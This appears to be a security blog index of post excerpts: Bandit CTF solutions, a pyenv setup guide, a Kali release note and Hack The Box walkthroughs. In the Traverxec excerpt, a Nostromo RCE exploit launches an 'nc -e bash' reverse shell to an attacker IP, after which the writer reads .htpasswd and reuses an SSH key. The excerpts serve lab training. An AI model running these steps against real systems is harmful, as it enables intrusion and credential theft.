Bandit CTF – Level 5

level 4 –> 5
bandit4@bandit:~$ ls -la
bandit4@bandit:~$ cd inhere/
bandit4@bandit:~/inhere$ ls -la
bandit4@bandit:~/inhere$ cat ./-file07
password = koReXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Bandit CTF – Level 4

level 3 –> 4
bandit3@bandit:~$ ls -la
bandit3@bandit:~$ cd inhere
bandit3@bandit:~/inhere$ ls -la
bandit3@bandit:~/inhere$ cat .hidden
password = pIwrXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Bandit CTF – Level 3

Level 2 –> 3
bandit2@bandit:~$ ls -la
bandit2@bandit:~$ cat ./spaces\ in\ this\ filename
password = UmHaXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Bandit CTF

Today I start publishing some of the first solutions to the Bandit CTF. http://overthewire.org/wargames/bandit/
In this first post, I’ll publish the first two levels.

level 0 –> 1
$ ssh bandit0@bandit.labs.overthewire.org -p 2220
pass = bandit0
bandit0@bandit:~$ ls
bandit0@bandit:~$ cat readme
password = boJ9XXXXXXXXXXXXXXXXXXXXXXXXXXXX

level 1 –> 2
bandit1@bandit:~$ ls -la
bandit1@bandit:~$ cat ./-
password level = CV1DXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Pyenv install and usage

Install
$ sudo apt-get install -y build-essential libssl-dev zlib1g-dev libbz2-dev libreadline-dev libsqlite3-dev wget curl llvm libncurses5-dev libncursesw5-dev xz-utils tk-dev libffi-dev liblzma-dev python3-openssl git
$ curl https://pyenv.run | bash
If we are using ZSH then we will now add the proper lines to our .zshrc.
$ echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.zshrc
$ echo 'export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.zshrc
$ echo -e 'if command -v pyenv 1>/dev/null 2>&1; then\n eval "$(pyenv init -)"\nfi' >> ~/.zshrc
Restart

HTB Heist

$ nmap -sC -sV -oA all -vv -p- 10.10.10.149
$ gobuster dir -u http://10.10.10.149 -w ~/tools/SecLists/Discovery/Web-Content/raft-medium-directories.txt -e
$ gobuster dir -u http://10.10.10.149 -w ~/tools/SecLists/Discovery/Web-Content/raft-large-files.txt -e -k php
Accessing http://10.10.10.149/login.php: there is a "Login as Guest" option.
http://10.10.10.149/issues.php: there is an "Attachment" link.
http://10.10.10.149/attachments/config.txt
The message talks about a Cisco router. Hazard asked for a user account to be created for him, so there should be a "hazard" username.
Testing the admin credentials we’ve just found. We need an

Kali Linux 2021.1 Released

The new Kali 2021.1 version has recently been released. The official post can be found here: https://www.kali.org/blog/kali-linux-2021-1-release/
The summary of the news is:
Xfce 4.16 – Our preferred and current default desktop environment has been updated and tweaked
KDE 5.20 – Plasma also received a version bump
Terminals – mate-terminal, terminator and tilix all had various work carried out on them
Command Not Found – A helping hand to say if

HTB Traceback

$ nmap -A -T4 -p- 10.10.10.181
Open ports:
22/tcp open ssh OpenSSH 7.6p1 Ubuntu
80/tcp open http Apache httpd 2.4.29
Access to http://10.10.10.181
Can we assume that there is a Web-shell in this box? Let’s try to find out.
$ gobuster dir -u http://10.10.10.181 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e
With our usual wordlist, there aren’t interesting results. Let’s try a different one taking into account the comment of the main site that talked about web-shells…
$ gobuster dir

HTB Traverxec

$ nmap -T4 -A -p- 10.10.10.165
Open ports:
22/tcp open ssh OpenSSH 7.9p1 Debian
80/tcp open http nostromo 1.9.6
Nostromo v1.9.6 web server (http://www.nazgul.ch/dev_nostromo.html)
$ searchsploit nostromo
Our web server is vulnerable to an RCE… 🙂
$ searchsploit -m 47837
$ python 47837.py 10.10.10.165 80 "nc -e bash 10.10.14.15 1234"
$ nc -lnvp 1234
whoami
python3 -c "import pty;pty.spawn('/bin/bash')"
We are www-data, let’s enumerate a little bit.
www-data@traverxec:/var/nostromo/conf$ ls -la
www-data@traverxec:/var/nostromo/conf$ cat .htpasswd
$ chmod 600 david.key
$ ssh -i david.key david@10.10.10.165

HTB Bastion

$ nmap -A -p- -T4 10.10.10.134
Open ports:
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp